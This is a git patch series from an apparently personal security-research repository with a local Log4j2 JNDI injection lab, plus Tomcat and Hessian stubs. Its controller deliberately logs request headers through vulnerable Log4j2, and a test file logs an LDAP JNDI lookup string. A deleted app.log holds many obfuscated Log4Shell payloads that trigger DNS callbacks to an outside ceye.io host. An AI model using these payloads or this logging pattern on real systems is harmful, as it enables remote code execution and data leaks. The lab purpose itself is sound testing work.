Configurator.setLevel("com.example.spring.controller.IndexController", Level.DEBUG); + + String referer = request.getHeader("Referer"); + logger.error("Referer: {}", referer); + String header = request.getHeader("User-Agent"); + logger.error("User-Agent: {}", header); +// logger.error("Hello, {}", name); + return String.format("Hello, %s!", name); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/tmp.java b/JNDI/Log4j2/src/main/java/com/example/tmp.java new file mode 100644 index 0000000..5d41b57 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/tmp.java @@ -0,0 +1,21 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import javax.naming.InitialContext; +import javax.naming.NamingException; + +public class tmp { + private static final Logger logger = LogManager.getLogger(tmp.class); + + public static void main(String[] args) throws NamingException { +// String url = "ldap://127.0.0.1:50389/7df78d"; +// InitialContext initialContext = new InitialContext(); +// initialContext.lookup(url); + + String message = "${jndi:ldap://127.0.0.1:50389/7df78d}"; + + logger.error("{}", message); + } +} diff --git a/JNDI/Log4j2/src/main/resources/application.yaml b/JNDI/Log4j2/src/main/resources/application.yaml new file mode 100644 index 0000000..ab8fc62 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/application.yaml @@ -0,0 +1,2 @@ +server: + port: 8005 \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/resources/log4j2.xml b/JNDI/Log4j2/src/main/resources/log4j2.xml new file mode 100644 index 0000000..4daec91 --- /dev/null +++ b/JNDI/Log4j2/src/main/resources/log4j2.xml @@ -0,0 +1,37 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/MiddleWare/Tomcat/.gitignore b/MiddleWare/Tomcat/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/MiddleWare/Tomcat/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/.gitignore b/MiddleWare/Tomcat/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/MiddleWare/Tomcat/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/MiddleWare/Tomcat/.idea/encodings.xml b/MiddleWare/Tomcat/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/MiddleWare/Tomcat/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/misc.xml b/MiddleWare/Tomcat/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/vcs.xml b/MiddleWare/Tomcat/.idea/vcs.xml new file mode 100644 index 0000000..d843f34 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/vcs.xml @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/pom.xml b/MiddleWare/Tomcat/pom.xml new file mode 100644 index 0000000..31f8c91 --- /dev/null +++ b/MiddleWare/Tomcat/pom.xml @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + Tomcat + war + 1.0-SNAPSHOT + Tomcat Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + Tomcat + + diff --git a/MiddleWare/Tomcat/src/main/java/com/test/servlet.java b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java new file mode 100644 index 0000000..9f2d3c0 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java @@ -0,0 +1,4 @@ +package com.test; + +public class servlet { +} diff --git a/MiddleWare/Tomcat/src/main/java/com/test/tmp.java b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java new file mode 100644 index 0000000..00a8f3c --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java @@ -0,0 +1,4 @@ +package com.test; + +public class tmp { +} diff --git a/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git a/MiddleWare/Tomcat/src/main/webapp/index.jsp b/MiddleWare/Tomcat/src/main/webapp/index.jsp new file mode 100644 index 0000000..cc264d7 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/index.jsp @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/11/29 + Time: 10:27 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git a/hessian/src/main/java/com/test/gadget/c3p0.java b/hessian/src/main/java/com/test/gadget/c3p0.java new file mode 100644 index 0000000..6042d8f --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/c3p0.java @@ -0,0 +1,4 @@ +package com.test.gadget; + +public class c3p0 { +} From 2798e64b44afeb9de16fc6a5d12c0002cdccaeda Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Mon, 8 Dec 2025 15:04:59 +0800 Subject: [PATCH 16/16] update --- JNDI/Log4j2/logs/app.log | 125 --------------------------------------- README.md | 14 +++-- 2 files changed, 9 insertions(+), 130 deletions(-) delete mode 100644 JNDI/Log4j2/logs/app.log diff --git a/JNDI/Log4j2/logs/app.log b/JNDI/Log4j2/logs/app.log deleted file mode 100644 index 5bab32d..0000000 --- a/JNDI/Log4j2/logs/app.log +++ /dev/null @@ -1,125 +0,0 @@ -2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:20 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:03:20 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:26 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dUq1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/ user -2025-12-08 14:03:27 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, 123 -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dWfi%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, ${jndi:dns://0${::-.}get${::-.}127${::-.}0${::-.}0${::-.}1${::-.}8005${::-.}Wfi${::-.}hpdth2${::-.}ceye${::-.}io/ user} -2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:05:06 ERROR com.example.spring.controller.IndexController - Hello, World -2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTOn%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTVK%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTOn$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTVK$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - Referer: 127 -2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - Referer: 127 -2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.dzu3.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.ldY20.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.YGL21.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.ldY30.hpdth2.ceye.io/user} -2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.YGL31.hpdth2.ceye.io/user} -2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7deCv%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jn%24%7benv::-%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dSmj%24%7b::-.%7d2%24%7b::-.%7d2%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMZw$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMZw%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dSmj$%7b::-.%7d3$%7b::-.%7d2$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7bsys:k5:-nD%7d%24%7blower:i%24%7bweb:k5:-:%7d%7ddns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7d98G%24%7b::-.%7d2%24%7b::-.%7d3%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36nD%7d$%7blower:i$%7bweb:k5:-:%7d%7ddns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7d98G$%7b::-.%7d3$%7b::-.%7d3$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{%24{%24{::-j}%24{::-n}%24{::-d}%24{::-i}:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMds%24%7b::-.%7d2%24%7b::-.%7d4%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${${${::-j}${::-n}${::-d}${::-i}:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMds$%7b::-.%7d3$%7b::-.%7d4$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user} -2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7deCv$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.2Wf20.hpdth2.ceye.io/%20user} -2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.2Wf30.hpdth2.ceye.io/%20user} -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.Ue320.hpdth2.ceye.io/%20user} -2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.Ue330.hpdth2.ceye.io/%20user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.Q0a21.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.49C20.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.49C30.hpdth2.ceye.io/ user} -2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.Q0a31.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.T3s21.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.De620.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.De630.hpdth2.ceye.io/ user} -2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.T3s31.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.cKd20.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.ShD21.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.cKd30.hpdth2.ceye.io/ user} -2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.ShD31.hpdth2.ceye.io/ user} -2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 -2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.r8P3.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://2.get.127.0.0.1.8005.OPY20.hpdth2.ceye.io/ user} -2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 